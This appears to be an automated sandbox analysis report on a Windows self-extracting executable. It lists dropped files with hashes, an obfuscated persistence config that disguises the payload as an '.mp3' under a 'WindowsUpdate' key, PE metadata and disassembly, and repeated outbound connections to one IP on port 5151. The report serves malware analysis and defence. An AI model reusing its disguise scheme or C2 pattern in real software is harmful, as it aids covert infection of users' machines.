                                              Preview:..T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.....T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.517312307798012
                                              Encrypted:false
                                              SSDEEP:12:UIVldnzxwXVoUbApRq1RfoSbdLjPlruYpdMQ2DuyX4Ozjc:UIVrzArKSRjbdLpruYp6LVXhc
                                              MD5:834D7436B1908047FBC4801E3D9EA735
                                              SHA1:8CC6441F6A4A65902AE20C8D0D73A59048227253
                                              SHA-256:056D4C251DE76715737124CCB63E6652840EE3EE66A41F45B109B3F413EE864B
                                              SHA-512:EFFC86EF8949E1C231F9C18C807AFC39882CAFA2BEB5E87F10E2AC5D8378D2F2AC3C94679EEFCFE9F4AF6C260E524BAC051FC789D147215CCD552A1D44EDAE7A
                                              Malicious:false
                                              Preview:f50235..ColorConstants FileConstants..352950q81ZrVFh028w23smi5ASTD3t45Ct47b4Fw158ndgMh3K8m85EiwUL2u71BM7lZtO224PpgS..DateTimeConstants ToolbarConstants..7I140n089014u589NkB234fraO117t2bUc22235..ButtonConstants StructureConstants..051t2ZNexB6gD177M3wL7DwCP9fyN9IObJ13veie35ZCH8hkXq072r3E65..UpDownConstants GuiDateTimePicker..0HA4463l63225A30l7V..TreeViewConstants ButtonConstants..2165..FontConstants GuiDateTimePicker..17cPgv6Fdp776612952eHNUp781420VTI8W983PRn00cpvD43sshTf0Ie6qdFaB2bhPVHJN14687h1QD9ZM6h26971hH5rc938Z7D60g585q20VD24BhB05L626UeS525S18lCuvmC7PZKb9k7MHy..GuiDateTimePicker StructureConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):113665448
                                              Entropy (8bit):6.924457735552897
                                              Encrypted:false
                                              SSDEEP:196608:Gt8gSuolgztogeon51s+rCBTHJVUdOHtBJagqthtgE/zBACLTxLun176fzoEh+To:M
                                              MD5:BD375FCAB430AB12BBE70CFFB392EE88
                                              SHA1:E7E5B1703F84C7ECF79E1F2F0F425FC084F1D215
                                              SHA-256:DE5DC11F91E1F382D44EA0CFD15983680CD2A9239882672C003EB7DA281F5218
                                              SHA-512:EAE4BF46DF8BEA8F9B0C4E028BDE510AFBB12A9BFB9709E5271848D4C9AB38879B987F6DCABE4B0DE7536A481F368A2EF516295C443BAEAAE8E3C2780C9C9F30
                                              Malicious:false
                                              Preview:..;.$...bp....u.w ..... .kJ....Q]Du.........e..~7....!}{%.9.k.X...j..ke.....J*b.+(<. N-dP1...E7........0............g..p...".l....`..b.|.b....MEZQ....(iyh}...P...?........+..-._k.?..T.....z..'.m.. ....#.c.s.-`.&..V..p...u#.$P....e..DF....W...w.j.O._.-....u= .....IA^.z....sl....&....o....Yp..E....1..2.hd~Bv....{.Xe...n.?.mMp|.c=.....Z}[by..]/..H...K.....k.r....n.3.g.b.6.4.w.B.4.8.0.3.7.X.O.5.n.9.0.i.6.5.g.8.r.2.d.J.2.....l.2.Q.8.l.H.0.L.....,...x.0]t..E.....m...1?h.o..!.>.R..m....X...4C..U..i....p#"....<@....wI.y.^j..}E....:A..X4..{Q...>...I...bI]a ...f..'...%...!.......t.RJm(.o.68.......J~.~o.x/}.E...v.....k.6.B.2.g.L.3.3.1.0.w.o.....X.t.6.Q.V.C.5.4.T.7.2.s.5.r.5.9.v.0.4.H.q.3.z.A.h.r.4.o.2.S.W.G.O.Z.M.5.F.L.e.6.m.K.1.3.N.W.k.8.....j.y.c.P.7.6.6.b.5.9.x.d.0.P.1.k.6.8.f.r.h.v.4.8.t.5.p.L.i.G.3.....m.6.4.W.9.2.....9.8.4.2.X.U.Y.0.5.4.4.2.9.C.5.W.3.U.9.6.2.X.j.e.C.r.Z.1.Y.T.9.3.k.....b.8.4.E.9.e.9......L..b..`..n...zh.jQ.3.^..<bDS.0../5.m..:|..)..Ja.5r.,.../
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):41169
                                              Entropy (8bit):5.574992140650956
                                              Encrypted:false
                                              SSDEEP:768:SqzHu71BxiT+rwNwh5KG/KKQs2TUdeDPz6YzTwnuO+YZk7IZ:NHU1rstNrGiKQRT9DL6DuOP9
                                              MD5:5FE3C2E677E90B8971DCAEC9D9CF973D
                                              SHA1:CCCEFD97B61B17F2BC60983D2437925A7B063B20
                                              SHA-256:762982A2B57B2A93DD63FBF230DA414B6C3ABC6240D4B0AF7BB940DC81B74512
                                              SHA-512:2C204731CC1BDB18259E737CDCE622833367413BF10A75A73E23D3C531E3739093D0E4227C032AAB61EA8F26A8D65175AC3072EAF61116FF07BC623E0D402727
                                              Malicious:false
                                              Preview:Gs8k9G..09Dze2Ri21v07024j3Bkj08k43620w..as6F9u248nt4E5D34X8TicUo56G1p6Iq7HWQ6CO543yP0E..xaJjJ6998evt364K2JMk3JUL1V169d17W1525g8u64Q8mg624Dq69u..RwDHspQjqT7082C211yji23005131f84T0V4Rt783H5qN..71503293t47A3715b4GE0K1n2HSP78l25n49k2qOp668h89L439GV76rXE63A660vI238..VPtgmDkG5IY651h2xX92d3O72m544t7j6KbS3789u3..8juXPy4HfT34a96W79i4L635wQN7C64m0fV5Q6G83u2Dsd..phmvnO5wH7bw707x270573Yr30Iaqb8Z3ornK7..Sk69g85nW3urpi71T05z02880K89onK84T33dy93ziqP..4J937x4E606vqL7fKZg2G8uTA2f20g8z8N7j58097O6w98030D1O8RN9S..Mnh8Sb8x5UW0x4M26I8f394Z8..9A9cur15YeDDM5O8G3A7rDs4949a4k9RYF76v99K..SM6gUf3u8v64W2N889l16N5arA6z268E1Y8T6c8b27d42d29S6i..S8whuJPCVO3N3Fm05JeGtD4M..l1p19Kskx87icmQeA2umK9E66LU8j87e320208152Hk75O7B1OP9UU22..t602Dct2yRctvCMtZyp4kn25XRJ0qH921b0r67t..4940R0K3j25Z941pc385q1bKK31ajV75rr6v905G4b497939SDz6k961po13O70z0..gu0QN79T640hn842q969k980Qe8i3k78137xBT5QI4x94G..u8u2ItTd0afA0F0T8lk38J1Eu5W1867To0PF8V8466vS13..Lc5l4blEH80kJtCcncqb3G3r12116x544DE59gG1Z0gR055nei3um11eU6x48Y..n62F5C0l6GM181230H77R8364N7
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):517
                                              Entropy (8bit):5.60876413392208
                                              Encrypted:false
                                              SSDEEP:12:g3tc6T0er7S8x1pbJ5+HB+PteGsoregI5v:sTNr7S8rpbJdPtWg8v
                                              MD5:4DAA3E600C4D2C162FFE78C5DF68AB8E
                                              SHA1:C1F052EB1577599B89B70AE99BD9E6C8DDE4F822
                                              SHA-256:C2B1869137E2E69E3969C50A0918EB71C5797F84FAF4093AEF0C890957A193EA
                                              SHA-512:35C537693DF896C6B62118BD38BBDC6C0B4233C391FA11FEC0E49373E08E7BAEDC9FAB07489BC9C55D7D69797820AEFC6C21C62B5A8669EE8AEF297DBF89ED6F
                                              Malicious:false
                                              Preview:94fl4Vi93m506967tqUkd2rq80v81m3D5T71v6B8JtB12z46779Q7o7M6EGvF4uJWM5dt4i62H71S43T9575xR5xP644ye..ToolbarConstants ToolbarConstants..59s492Ipmlntg9c0WuAa6yOc2fLAUFHlRtlbYoa..FileConstants ToolbarConstants..863Zy4EYs568DAWVZ2uH3890igu5Y361H1Y8v4o929lSB6556M2yTP3o342t8721N0H6p5nw5959eA2..GuiDateTimePicker StructureConstants..c64xycev244ZQqU4x410L5X6rVO617q4C7z3K7gB5k81h3g4sx2HPo2VDBj113h748313BS7G7jI8bt315ob95142G2g09z0..StructureConstants ToolTipConstants..QV0HiRFd3ZDK9227R86G6WQ..ComboConstants GuiDateTimePicker..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):507
                                              Entropy (8bit):5.6090252322037335
                                              Encrypted:false
                                              SSDEEP:12:B0SXXoGYepQld6qJM7hBfZJyCv6jMJoDbGPWqJ5QEWz:JlYQyd6WM7BJzS4mbtq5uz
                                              MD5:992C91B45A9F3472868D47E61CB8675E
                                              SHA1:FCDFBC8EC428982B4CB0B09FB00244DE0BC78073
                                              SHA-256:A8A5116542D33261544E18C4431C11A45F77AB24A7F06A2C1D06480066EC6E62
                                              SHA-512:24054844512035AB6962F3ABE2DA36D56AC7E182A72A19D8A38F1C356D7BDE30F14FE6FE3EF057C602A73E53A5D9131676C01F1EF99B545877015A4D3243B9EB
                                              Malicious:false
                                              Preview:8u945m2142LJ65a6So7R8t5st6601672XsVFQib88SnLg9143011331K3RuSbm3..GuiDateTimePicker StructureConstants..mSs378DDJFLCg18436734Q4owR926424B2q2EexiB..DateTimeConstants GuiDateTimePicker..9ZD6F6qLj9L01K0Z904p58I62uwhO5xE78414y9z074U1i4TxBRJtk1ak3qC223u0A74u83jKy0t..ToolbarConstants ToolbarConstants..vhhqME9L023D54yNN5374t7676B88B69DrU6uipg1csk9mRX436188452v88a57mqh5Yv930203v1bX00p630uz9NMO0qrg22OfJjm0qX53kIgVl4B343Q4xd7GM8R741352Bxng4HWRbY8r1swz4E5hE74167uHr3R13on315KY89..UpDownConstants DateTimeConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):86
                                              Entropy (8bit):4.972176674810693
                                              Encrypted:false
                                              SSDEEP:3:YRRvufhJ4ENvuAp9JlC9hRGdY66zidsI8y:Av0f9ZoG3648y
                                              MD5:6883F353F1F2DCAAEC509E79B343884A
                                              SHA1:1C14B5DD9B50C493F1B1E47D9797D248909E9892
                                              SHA-256:B97288CD746477E7C09411B8F5182F217DD8A95B4ECDE7DDCB046A5436ED0F56
                                              SHA-512:730DC24F722F73E9449D46272E45DD55863BFF38D3EC947A4E200230D67A7C27F4F643F436827107A3304916D6A5B9F2D7046951A1811873A9E46AB481AFB2FE
                                              Malicious:false
                                              Preview:[S3tt!ng]..stpths=%appdata%..Key=WindowsUpdate..Dir3ctory=wlnk..ExE_c=qwlvpmrupf.mp3..
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.890106938142716
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:ngPebbPhbp.exe
                                              File size:1'684'188 bytes
                                              MD5:fa000351e26e17543f67e3dedc97d37e
                                              SHA1:c59fc4f489ac15d5a1d455abbf0c3c5ad6fcc189
                                              SHA256:5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350
                                              SHA512:1bf517f2b0d3c156c2850f161f4bedf735361a8951d807b05eeaa711a0720031e545d5dd56f46337f059ef18bea1523ec1f5a5b96e83d6380eb74e6526bd0025
                                              SSDEEP:49152:cpUlRhQMnbfKk8QkwCRYhtkp0d0X1zJ5w+ufya5h:cpUlYEfKk8DTROk6dK1l5wF
                                              TLSH:D4752202BBC48472D5B324310AF58B511A7CB9212F718ACF63D519BD9B71AD2DA31FA3
                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                              Icon Hash:4f858a8a888ac14f
                                              Entrypoint:0x4265d0
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:99ee65c2db82c04251a5c24f214c8892
                                              Instruction
                                              call 00007FF4D0D3743Bh
                                              jmp 00007FF4D0D36DBDh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ecx
                                              lea ecx, dword ptr [esp+08h]
                                              sub ecx, eax
                                              and ecx, 0Fh
                                              add eax, ecx
                                              sbb ecx, ecx
                                              or eax, ecx
                                              pop ecx
                                              jmp 00007FF4D0D3646Fh
                                              push ecx
                                              lea ecx, dword ptr [esp+08h]
                                              sub ecx, eax
                                              and ecx, 07h
                                              add eax, ecx
                                              sbb ecx, ecx
                                              or eax, ecx
                                              pop ecx
                                              jmp 00007FF4D0D36459h
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007FF4D0D29999h
                                              push 0044634Ch
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007FF4D0D37C67h
                                              int3
                                              jmp 00007FF4D0D3D99Eh
                                              int3
                                              int3
                                              push 004293C0h
                                              push dword ptr fs:[00000000h]
                                              mov eax, dword ptr [esp+10h]
                                              mov dword ptr [esp+10h], ebp
                                              lea ebp, dword ptr [esp+10h]
                                              sub esp, eax
                                              push ebx
                                              push esi
                                              push edi
                                              mov eax, dword ptr [00449778h]
                                              xor dword ptr [ebp-04h], eax
                                              xor eax, ebp
                                              push eax
                                              mov dword ptr [ebp-18h], esp
                                              push dword ptr [ebp-08h]
                                              mov eax, dword ptr [ebp-04h]
                                              mov dword ptr [ebp-04h], FFFFFFFEh
                                              mov dword ptr [ebp-08h], eax
                                              lea eax, dword ptr [ebp-10h]
                                              mov dword ptr fs:[00000000h], eax
                                              ret
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              mov ecx, dword ptr [ebp-10h]
                                              mov dword ptr fs:[00000000h], ecx
                                              pop ecx
                                              pop edi
                                              pop edi
                                              pop esi
                                              pop ebx
                                              mov esp, ebp
                                              pop ebp
                                              push ecx
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x9428.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x2afc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x580000x94280x960002b344b619e272faf6cb04beedab1a4eFalse0.7404947916666667data7.0359500857205655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x620000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              PNG0x585540xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                              PNG0x5909c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                              RT_ICON0x5a6480x475cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8958287716225093
                                              RT_DIALOG0x5eda40x286dataEnglishUnited States0.5092879256965944
                                              RT_DIALOG0x5f02c0x13adataEnglishUnited States0.60828025477707
                                              RT_DIALOG0x5f1680xecdataEnglishUnited States0.6991525423728814
                                              RT_DIALOG0x5f2540x12edataEnglishUnited States0.5927152317880795
                                              RT_DIALOG0x5f3840x338dataEnglishUnited States0.45145631067961167
                                              RT_DIALOG0x5f6bc0x252dataEnglishUnited States0.5757575757575758
                                              RT_STRING0x5f9100x1e2dataEnglishUnited States0.3900414937759336
                                              RT_STRING0x5faf40x1ccdataEnglishUnited States0.4282608695652174
                                              RT_STRING0x5fcc00x1b8dataEnglishUnited States0.45681818181818185
                                              RT_STRING0x5fe780x146dataEnglishUnited States0.5153374233128835
                                              RT_STRING0x5ffc00x46cdataEnglishUnited States0.3454063604240283
                                              RT_STRING0x6042c0x166dataEnglishUnited States0.49162011173184356
                                              RT_STRING0x605940x152dataEnglishUnited States0.5059171597633136
                                              RT_STRING0x606e80x10adataEnglishUnited States0.49624060150375937
                                              RT_STRING0x607f40xbcdataEnglishUnited States0.6329787234042553
                                              RT_STRING0x608b00x1c0dataEnglishUnited States0.5178571428571429
                                              RT_STRING0x60a700x250dataEnglishUnited States0.44256756756756754
                                              RT_GROUP_ICON0x60cc00x14data1.05
                                              RT_MANIFEST0x60cd40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                              DLLImport
                                              KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                              OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                              gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 21, 2024 13:45:26.186892986 CET497365151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:26.306432962 CET51514973651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:26.306524038 CET497365151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:26.306726933 CET497365151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:26.426755905 CET51514973651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:28.461631060 CET51514973651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:28.461714029 CET497365151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:31.213656902 CET497365151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:31.333384991 CET51514973651.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:36.187004089 CET497375151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:36.307363987 CET51514973751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:36.307481050 CET497375151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:36.307619095 CET497375151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:36.427083969 CET51514973751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:38.461788893 CET51514973751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:38.461858988 CET497375151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:41.194387913 CET497375151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:41.314018011 CET51514973751.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:46.190478086 CET497385151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:46.310224056 CET51514973851.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:46.313878059 CET497385151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:46.314052105 CET497385151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:46.433593988 CET51514973851.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:48.465337038 CET51514973851.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:48.465428114 CET497385151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:51.194165945 CET497385151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:51.315812111 CET51514973851.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:56.187531948 CET497405151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:56.307184935 CET51514974051.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:56.309743881 CET497405151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:56.309743881 CET497405151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:45:56.429703951 CET51514974051.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:58.468977928 CET51514974051.75.171.9192.168.2.4
                                              Nov 21, 2024 13:45:58.469094992 CET497405151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:01.206964016 CET497405151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:01.330326080 CET51514974051.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:06.202698946 CET497625151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:06.322391987 CET51514976251.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:06.322581053 CET497625151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:06.322823048 CET497625151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:06.540515900 CET51514976251.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:08.435230017 CET51514976251.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:08.435323954 CET497625151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:11.223354101 CET497625151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:11.343072891 CET51514976251.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:16.233838081 CET497855151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:16.357084990 CET51514978551.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:16.357335091 CET497855151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:16.357439041 CET497855151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:16.477894068 CET51514978551.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:18.521764994 CET51514978551.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:18.521822929 CET497855151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:21.255970001 CET497855151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:21.375534058 CET51514978551.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:26.249675989 CET498095151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:26.369579077 CET51514980951.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:26.369992971 CET498095151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:26.370179892 CET498095151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:26.489634037 CET51514980951.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:28.498133898 CET51514980951.75.171.9192.168.2.4
                                              Nov 21, 2024 13:46:28.498302937 CET498095151192.168.2.451.75.171.9
                                              Nov 21, 2024 13:46:31.273983955 CET498095151192.168.2.451.75.171.9
